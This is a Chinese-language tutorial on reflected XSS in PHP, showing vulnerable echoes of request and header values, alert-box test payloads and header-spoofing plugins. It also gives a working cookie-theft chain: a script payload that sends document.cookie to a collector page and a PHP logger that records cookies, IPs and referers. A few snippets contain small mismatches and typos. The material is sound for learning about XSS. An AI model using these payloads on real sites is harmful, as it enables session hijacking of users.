企业🤖AI智能体构建引擎,智能编排和调试,一键部署,支持私有化部署方案 广告
**xss 漏洞大致分三种** * 反射型 XSS 漏洞 * 保存型 XSS 漏洞 * 基于 DOM 的 XSS 漏洞 反射型 XSS 漏洞 它通过给别人发送带有恶意脚本代码参数的 URL,当 URL 地址被打开时,特有的恶意 代码参数被 HTML 解析、执行。 它的特点是非持久化,必须用户点击带有特定参数的链接才能引起。 一:变量的直接输出 ``` <?php echo $_GET['xss']; ?> ``` ``` //http://localhost/test/ddd.php?p=<script>alert(document.cookie);</script> <?php echo $_GET['p']; ?> ``` **二:$_SERVER 变量参数** $_SERVER['PHP_SELF'] ``` //http://localhost/test/ddd.php/<script>alert(1111);</script> echo $_SERVER['PHP_SELF']; ``` $_SERVER['REQUEST_URI'] ``` //加上urldecode后就会有xss效果 echo urldecode($_SERVER['REQUEST_URI']); ``` $_SERVER['HTTP_USER_AGENT'] ``` //http://localhost/test/ddd.php?<script>alert(1111);</script> echo $_SERVER['PHP_SELF']; //输出:Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0 ``` 怎么让他输出xss?为了方便我们将下载浏览器插件辅助我们 安装SIMPLE MODIFY HEADERS或者modify header value 插件 ![](https://img.kancloud.cn/12/79/1279d2abda6313ea88e8d455366474b7_1260x467.png) 再次访问http://localhost/test/ddd.php 即可看到弹窗;modify header value同理 ![](https://img.kancloud.cn/11/76/117620d2b8a47e1920079efaff7b76d1_1330x276.png) $_SERVER['HTTP_REFERER'] 三:http 请求格式 User-Agent: Referer **四:利用** 测试 <script>alert(1);</script> 利用Cookie `<script>var i=new Image;i.src="http://127.0.0.1/xss.php?c="%2bdocument.cookie;</script> ` 具体: ``` 访问: http://localhost/test/ddd.php?c=<script>var i=new Image;i.src="http://localhost/test/xss.php?c="%2bdocument.cookie;</script> //ddd.php echo $_GET['c']; //xss.php $cookie=$_GET['c']; $ip=getenv ('REMOTE_ADDR'); $time=date ("j F,Y, g: i a"); $referer=getenv ('HTP_REFERER'); $fp = fopen ('cook.txt', 'a'); fwrite($fp, 'Cookie:'.$cookie.'<br> IP:'.$ip.'<br> Date and Time:'.$time.'<br> Referer:'.$referer.'<br><br><br>'); ``` modify headers